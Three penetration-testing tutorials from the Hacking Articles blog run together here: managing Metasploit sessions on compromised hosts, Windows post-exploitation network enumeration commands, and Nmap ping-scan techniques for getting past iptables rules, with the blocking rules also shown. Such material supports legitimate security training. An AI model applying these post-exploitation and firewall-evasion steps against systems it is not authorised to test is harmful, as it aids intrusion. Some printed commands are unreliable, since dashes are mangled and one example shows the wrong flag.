Run a command in multiple sessions

We can run multiple OS arbitrary commands of on multiple meterpreter session using the sessions command.

Syntax: sessions -c [command] -i [Session id]

Command: sessions -c hostname -i 1, 2, 3

As you can see in the screenshot provided below that the hostname command ran on the sessions 1, 2 and 3 giving us Hostnames of the respectable Systems.

Get Detailed Information about Sessions

Use verbose option for obtaining complete detail of session, it described the type of session achieve i.e. meterpreter or shell; inform target system hostname and etc.

Command: sessions -v

From given below image you can observe that output result using verbose option with session command.

Run a Script or a Module in Multiple Sessions

Syntax: sessions -s [script-name]

Command: sessions -s winenum

As you can see in the screenshot provided above that the winenum script ran on the sessions 4, 5 and 6 enumerating data from the respectable Systems and save the output result into text files in pavan17.1611 folder.

Explore above highlighted path ./root/.msf4/logs/scripts/winenum/pavan to obtain the output result of text file and from given below image you can observe that it showing all text files which has contain the output result of above executed command. 

From given below image you can read the information stored inside ipconfig—all.txt file for network configuration.

Assign Name to Sessions

We can name the sessions anything we want so as to differentiate between the sessions. To Name a session use the following command.

Syntax: sessions -n [Name] -i [Session ID]

Command: sessions -n Yondu -i 1

From given below image you can observe we have successfully named Session 1 as ‘Yondu’; here session ID 1 denotes yondu as session Name.

Kill a Particular Session

If we want to close a particular session, we can do so using Kill option with particular session ID in the sessions command.

Syntax: sessions -k [Session ID]

Command: sessions -k 3

As you can see in the given screenshot that we have closed session 3 using the sessions command.

Kill All Session

If we want to close all the sessions, we can do so using Kill option without editing any session ID in the sessions command.

Command: sessions -K

As you can see in the given screenshot that we have closed all the sessions using the sessions command.

Upgrading a Shell to Meterpreter

Many a times while hacking through direct exploits we get to the shell of the remote system but due to such vast usability of the Meterpreter command we need to get the meterpreter shell. We can upgrade a normal shell to meterpreter shell using the sessions command

Firstly let’s gain a shell; here I am using the direct exploit as shown in the given screenshot which when executed gives us the shell of the server.

You can clearly see that we have a Linux shell at session #1. Now let’s upgrade this shell to meterpreter Shell.

Firstly press “Ctrl+z” to send this shell in the background, then use upgrade option  with session ID as shown in the following Sessions Command.

Command: sessions -u 1

As you can see in the image that the meterpreter shell is opened in the session #2.

 Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Sessions Command in Metasploit appeared first on Hacking Articles.

Hello friends!! Today you will learn how penetrate a network for enumerating any information of a system once it is compromised by any attacker.

Requirement

Attacker: Kali Linux

Targets: Windows operating system

Open Kali Linux terminal and type msfconsole in order to load metasploit framework.  Now you need to compromise victim’s machine once to achieve any type of session either metrepreter or shell and to do so you can read our previous article from here. Now to make Post Exploitation, we will need an Administrator Privileged shell, which can be found here.

Get Information about Network Cards

We can enumerate information about the Network Interface Cards using the systeminfo command.

Information can be extracted:

Number of NIC Cards, Manufacturer of NIC Cards, Model, Type (Wireless or LAN).

Command: systeminfo | findstr Network

From given below image you can observe 2 Network Interface Cards is installed.

ARP

Arp or Address Resolution Protocol converts the maps the IP Address to the MAC Address of the Devices. Using the arp command we can enumerate the mac addresses of other systems in the same network as the victim’s system.

Here we are using [-a] to get the list of all the entries of arp cache.

Command: arp -a

From given below image you can see the stored Mac address of arp table.

Get DNS Cache

We can enumerate DNS Resolver cache using the ipconfig command.

DNS Resolver is a temporary database, maintained by the operating system. It contains records of all the recent visits or the attempted visits to websites and other internet domains.

Here we are using [/displaydns] to display the complete dns cache.

Command: ipconfig /displaydns

From given below image you can observer following output is contains:

Record Name: Name with which the DNS query was initiated

Record Type: It is a number to represent the IPv4 or IPv6 address (1 is for IPv4 and 28 is for IPv6)

Time To Live: Time in seconds after which cache entry will expire

Data Length: Length of the data in bytes, IPv4 has 4 bytes and IPv6 has 16 bytes

A/AAAA Record: A is the Address of IPv4 and AAAA is the address of IPv6 (Four A because the address is four times in size as compared to IPv4)

Display all the Connections and Listening Ports on a System

While penetration testing a Remote PC, knowledge of all the connections and listening ports along with the Process id is essential so that we can migrate session if needed

This can be done using netstat command

Here we are using following options with netstat command:

[-a] to display all connections and listening ports 

[-n] to display address and port number numerically

[-o] to display the Process ID

Syntax/Example: netstat -ano

Display All the TCP Connections

To enumerate all the TCP connections, we will use netstat command. Here we are using following options with netstat command:

[-a] to display all connections and listening ports 

[-n] to display addresses and port numbers in numeric form

We are going to use findstr command to filter out the Connections which mentions TCP.

Command: netstat -na | findstr TCP

From give below image you can observe that all state of TCP connection i.e. Listening, Established and Close Wait on their respective Port number.

Display All the UDP Connections

To enumerate all the UDP connections, we will use netstat command. Here we are using following options with netstat command:

[-a] to display all connections and listening ports 

[-n] to display addresses and port numbers in numeric form

We are going to use findstr command to filter out the Connections which mentions UDP.

Syntax/Example: netstat -na | find “UDP”

Similarly From give below image you can observe that all state of UDP connection on their respective Port numbers is left blank *:* which means no UDP connection established.

Display All the Established Connections

While penetration testing a Remote PC, knowledge of all Established connections and listening ports is also essential. This can be done using netstat command.

Here we are using following options with netstat command:

[-n] to display addresses and port numbers in numeric form

[-a] to display all connections and listening ports 

We are going to use find command to filter out the Connections which mentions Established.

Command: netstat -na | find “ESTABLISHED”

From given below image you can observe that it shown established TCP connection through between source IP source Port and destination IP and destination Port.

Display the Routing Tables

While penetration testing a Remote PC, knowledge of Routing Tables is essential because Routing tables are used to generate the information about the routes which were chosen by the routing algorithm as preferred routes for packet forwarding and it gives info about the netmask and gateways too.

It contains the Interface List, IPv4 Route Table, Persistent Routes, IPv6 Route Table.

This can be done using netstat command

Here we are using following options with netstat command:

[-n] to display addresses and port numbers in numeric form

[-r] to display the routing table 

Command: netstat –nr

Get Executables Which Created Connections

While penetration testing a Remote PC, knowledge of all executable involved in creating each connection, all connections and listening ports, addresses and port numbers in numerical form, owning process ID is very essential because it gives the attacker information about the connections, port numbers as well as Process ID.

This can be done using netstat command

Here we are using following options with netstat command:

[-b] to displays the executable involved in creating each connection or listening port

[-a] to display all connections and listening ports 

[-n] to display addresses and port numbers in numeric form

[-o] to display the owning process ID associated with each connection

Command: netstat –bano

From given below image you can observe that it is showing name of running service on a particular port.

Get All the Adapters

We can enumerate all the adapters connected to the victim’s system by using ipconfig command.

As the output of ipconfig command is very vast so we will use the findstr command to filter out the specific result about the adapters.

Command: ipconfig | findstr adapter

Get All the Addresses

We can enumerate all the address including IPv4 and IPv6 by using ipconfig command.

As the output of ipconfig command is very vast so we will use the findstr command to filter out the specific result about the address.

Command: ipconfig | findstr Address

Get the Basic IP Details

We can get the Basic Network Configuration on the Victim’s System and the Network in which the Victim is connected to through the ipconfig command.

[/all] is used to extract all the ipconfig information

Syntax: ipconfig /all

Victim System is connected to a Wi-Fi so it properties can be viewed below

Things to enumerate:

Adapter Name, Model, Type, MAC Address, IPv4 Address, IPv6 Address, Subnet Mask, DHCP Server, Default Gateway and much more.

Ping Sweep

Ping Sweep is a networking technique to get a range of active terminals on the network.

IP Addresses from which we get a reply are active, rest are not.

Command: for /L %i in (100,1,225) do ping 192.168.1.%i | findstr TTL

From given below image you observe the result of multiple Ping response in a network using Ping command loop.

UDP Statistics

In order to obtain statistics for established UDP connection we can execute given command which describe information of UDP traffic send or received.

Command: netstat -s -p udp

[-s] denotes statics option

[-p] denotes protocols

From given below image you can observe that it showing details such as datagrams received, received error and etc.

TCP Statistics

In order to obtain statistics for established TCP connection we can execute given command which describe information of TCP traffic send or received.

Command: netstat -s -p TCP

[-s] denotes statics option

[-p] denotes protocols

From given below image you can observe that it showing details such as segment received, failed attempted, Reset connection and etc.

Display Connections Sorted by Port

Options Used:

[-a]: To Display all active TCP connections and UDP ports on which

[-n]: Addresses and Port Numbers are displayed numerically

[-o]: Display Connections with process IDs

We are using findstr to sort result for 443 Ports

Command: netstat -ano | findstr 443

From given below image you can observe that it has shown TCP connection state only for port 443.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Manual Post Exploitation on Windows PC (Network Command) appeared first on Hacking Articles.

In this article we are going to scan the target machine with different Nmap ping scans and the response packets of different scans can be confirmed by analysis of Nmap traffic through Wireshark.

Ping scan in nmap is done to check if the target host is alive or not. As we know that ping by default send the ICMP echo request and gets an ICMP echo reply if the system is alive. Ping scan by default send an ARP packet and gets a response to check if the host is up.

Nmap scans changes their behavior according to the network they are scanning.

• Scanning Local Network with Nmap where nmap sends an ARP packet with every scan
• If an external network is to be scanned; Nmap sends following request packets:

1. ICMP echo request
2. ICMP timestamp request
3. TCP SYN to port 443
4. TCP ACK to port 80

In this article we are using —disable-arp-ping attribute for changing the behavior of nmap scans to treat a local network as an public network.

Let’s Start!!

Ping Sweep

In order to identify live host without using ARP request packet Nmap utilize –sP option which is known as Ping Sweep Scan. We can use –sn flag which mean no port scan also know as ping scan.

nmap –sP 192.168.1.104 –disable-arp-ping

or

nmap –sn 192.168.1.104 –disable-arp-ping

From given below image you can observe it found 1 Host is up. Since we have disables Arp request packet for local network scans by using parameter –disable-arp-ping therefore here it will treat it as an external network and behave accordingly that as discussed above.

Demonstrating working of Ping Sweep using wireshark

From given below image you can observer following packet of request and reply between both network IP

1. ICMP echo request
2. TCP SYN to port 443
3. TCP ACK to port 80
4. ICMP timestamp request
5. ICMP echo reply
6. TCP RST, ACK to port 443
7. TCP RST to port 80
8. ICMP timestamp Reply

Block Ping Sweep Scan

Now let’s put some firewall rules in IPTABLES to drop ICMP packets, TCP SYN packets on port 443 and TCP ACK on port 80 which will block Ping Sweep scan

sudo iptables -I INPUT -p ICMP -j DROP

sudo iptables -I INPUT -p tcp –tcp-flags ALL ACK –dport 80 -j DROP

sudo iptables -I INPUT -p tcp –tcp-flags ALL SYN –dport 443 -j DROP

Now repeat again ping sweep scan for identifying state of live host. From given below image you can observe this time it shows that 0 host is up which means firewall has blocked packets send by this scan.

Again demonstrating request packets of Ping Sweep scan with wireshark and if you notice given below image then you will found that this time it has not received any reply packet.

Bypass Ping Sweep Filter using TCP SYN Ping

Now, we’ll try to bypass the firewall rules by using ping scan with TCP SYN packets, for that we’ll use –PS attribute. –PS sends TCP SYN packet on port 80 by default; we can change it by specifying the ports with it, like: -PS443.

nmap -sP -PS 192.168.1.104 –disable-arp-ping

From given below image you can observe that observe it found 1 Host is up.

From given below image you can observe that it is showing result which similar to NMAP stealth scan. Here it is following TCP Half connection mechanism where SYN packet is send on port 80 and received SYN, ACK from port 80 and then RST packet for reset connection

The difference between –sP packet on port 80 and –PS packet on port 80 is as following:

• Ping sweep scan [-sp] send TCP ACK packet on port 80 and hex value of ACK flag is 10, as reply from host machine it receives RST packet whose hex value is 4.
• TCP SYN Ping scan send TCP SYN packet on port 80 and its hex value is 2, as reply it received SYN, ACK packet whose value is sum of their hex value i.e. 2 + 10 = 12 and able to bypass above firewall rule applied on port 80 for TCK ACK packet.

Block TCP SYN Ping Scan

Sometimes network admin apply filter as given below using Iptables on TCP SYN packet to drop all SYN packet to initiate TCP connection with all TCP Port in their network.

sudo iptables -I INPUT -p tcp –tcp-flags ALL SYN -j DROP

As result it block the NMAP TCP SYN Ping probes so that it could not identify state of live host.

Now repeat again TCP SYN Ping for identifying state of live host. From given below image you can observe this time it shows that 0 host is up which means firewall has blocked packets send by this scan.

Bypass TCP SYN Ping using TCP ACK Ping

In order to bypass this, we’ll use ping scan using TCP ACK packets, for that we’ll use –PA attribute. –PA sends TCP ACK packet on port 80 by default, we can change it by specifying the ports with it, like: -PA443

nmap -sP -PA 192.168.1.104 –disable-arp-ping

From given below image you can observe that observe it found 1 Host is up.

When you will notice given below packets captured by wireshark you will found that here ACK packet is sent on port 80 as reply received RST packet from port 80.

Block TCP ACK Ping Scan

Sometimes network admin apply filter as given below using Iptables on TCP ACK packet to drop all ACK packet to established TCP connection with all TCP Port in their network.

sudo iptables -I INPUT -p tcp –tcp-flags ALL ACK -j DROP

As result it block the NMAP TCP ACK Ping probes so that it could not identify state of live host.

Now repeat again TCP ACK Ping for identifying state of live host. From given below image you can observe this time it shows that 0 host is up which means firewall has blocked packets send by this scan.

Bypass TCP ACK Ping using ICMP Echo

In some scenario network admin apply firewall filter on TCP flag to resist unwanted TCP communication in network, here let’s consider that network admin had blocked TCP communication by applying filter on SYN as well on ACK flag.

In order to bypass this rule we’ll use ping scan with ICMP packets, for that we’ll use –PE attribute. –PE sends ICMP echo request packet [ICMP type 8] and received ICMP echo reply packet [ICMP type 0].

nmap -sP -PE 192.168.1.104 –disable-arp-ping

From given below image you can observe that observe it found 1 Host is up.

Block ICMP Echo Ping Scan

Usually most of network admin apply ICMP filter on their network so that other system or network cannot able to Ping their network.

sudo iptables -A INPUT -p icmp –icmp-type echo-request -j DROP

As result it block the NMAP ICMP echo Ping probes so that it could not identify state of live host.

Now repeat again TCP ICMP Ping for identifying state of live host. From given below image you can observe this time it shows that 0 host is up which means firewall has blocked packets send by this scan.

Demonstrating NMAP ICMP echo Ping with wireshark shows only ICMP request packet in network and didn’t received any reply packet from host network as shown in given below image.

Bypass ICMP Echo Ping using ICMP Timestamp Ping

In order to bypass this rule we’ll use ping scan with ICMP packets, for that we’ll use –PP attribute. –PP sends ICMP timestamp request packet [ICMP type 13] and received ICMP timestamp reply packet [ICMP type 14].

nmap -sP -PE 192.168.1.104 –disable-arp-ping

From given below image you can observe that observe it found 1 Host is up.

Demonstrating NMAP ICMP timestamp Ping with wireshark shows ICMP timestamp request packet send  in network and  received any timestamp reply packet from host network as shown in given below image.

Block ICMP Ping Scan

It might be possible that network admin had block entire types ICMP message by dropping all ICMP packets using following iptables filter.

sudo iptables -I INPUT -p ICMP -j DROP

As result it block the NMAP ICMP Ping probes so that it could not identify state of live host.

Now repeat again ICMP Ping either –PP or PE for identifying state of live host. From given below image you can observe this time it shows that 0 host is up which means firewall has blocked packets send by this scan.

Bypass ICMP Ping Scan using UDP Ping

We have seen multiple ways to check if the system is live. Now, you can determine whether a system is up or not whether it is on local network or public network.

We had observed that ping scan with ICMP ping is not working or even if TCP packet filter is also enabled in host network then it become difficult to identify live host, now to bypass such types of rule we’ll use ping scan with UDP packets, for that we’ll use –PU attribute.

 –PU sends UDP packet when no ports are specified, the default is 40125, as reply received ICMP message such as “ICMP destination unreachable” which means host is live.

nmap -sP -PU 192.168.1.104 –disable-arp-ping

From given below image you can observe that observe it found 1 Host is up.

Demonstrating NMAP UDP Ping with wireshark shows UDP request packet send on 40125 in network and  received ICMP destination unreachable as reply packet from host network as shown in given below image.

Block UDP and Ping Sweep

Now let’s put some firewall rules in IPTABLES to drop ICMP packets, TCP SYN packets on port 443 and TCP ACK on port 80 which will block Ping Sweep scan as well as Drop UDP packet. Might be network admin had blocked entire TCP packet.

sudo iptables -I INPUT -p ICMP -j DROP

sudo iptables -I INPUT -p tcp –tcp-flags ALL ACK –dport 80 -j DROP

sudo iptables -I INPUT -p tcp –tcp-flags ALL SYN –dport 443 -j DROP

sudo iptables -I INPUT -p udp -j DROP

As result it will resist NMAP for making TCP Ping, ICMP Ping and UDP ping so that it could not identify state of live host.

Now repeat again UDP Ping for identifying state of live host. From given below image you can observe this time it shows that 0 host is up which means firewall has blocked packets send by this scan.

Bypass UDP and Ping Sweep using Protocol Scan

Using Protocol Ping scan we can identify live host when ICMP, TCP and UDP has been blocked, for that we’ll use –PO attribute. –PO sends IP packet with the particular protocol number place in their IP header, If no protocols are precise, the default is to send multiple IP packets for ICMP (protocol 1), IGMP (protocol 2), and IP-in-IP (protocol 4).

nmap -sP -PO 192.168.1.104 –disable-arp-ping

From given below image you can observe that observe it found 1 Host is up.

From given below image of wireshark we can observe the following mechanism followed by Protocol ping scan.

• Send ICMP Echo to host network
• Send IGMP query to host network
• Send IPv4 (IP-in-IP) to host network
• Received ICMP Destination unreachable as reply from Host

Block IP Protocol Ping Scan

Now let’s put some firewall rules in IPTABLES to drop ICMP packets, TCP SYN packets on port 443 and TCP ACK on port 80 which will block Ping Sweep scan as well as Drop UDP packet and IP protocol too in network to prevent the network from any kind of Ping scan. Might be network admin had blocked entire TCP packet.

sudo iptables -I INPUT -p ICMP -j DROP

sudo iptables -I INPUT -p tcp –tcp-flags ALL ACK –dport 80 -j DROP

sudo iptables -I INPUT -p tcp –tcp-flags ALL SYN –dport 443 -j DROP

sudo iptables -I INPUT -p UDP -j DROP

sudo iptables -I INPUT -p IP -j DROP

As result it will resist NMAP for making TCP Ping, ICMP Ping, UDP ping and Protocol ping so that it could not identify state of live host.

Now repeat again Protocol Ping for identifying state of live host. From given below image you can observe this time it shows that 0 host is up which means firewall has blocked packets send by this scan.

Bypass IP protocol Ping using No Ping Scan

Now when above all Ping scan get failed to identify state of Host is up or down then we choose the last and best option “No Ping” for we will use –PN/-P0/-Pn and basically perform TCP port scan for top 1000 ports.

 If you want to prevent Port scan and ping scan use sweep ping with no ping as given below to identify state of host is up or down.

nmap -sP -PN 192.168.1.104 –disable-arp-ping

From given below image you can observe that observe it found 1 Host is up.

Auhtor:  Deepanshu is a Certified Ethical Hacker and a budding Security researcher. Contact here.

The post Understanding Guide for Nmap Ping Scan (Firewall Bypass) appeared first on Hacking Articles.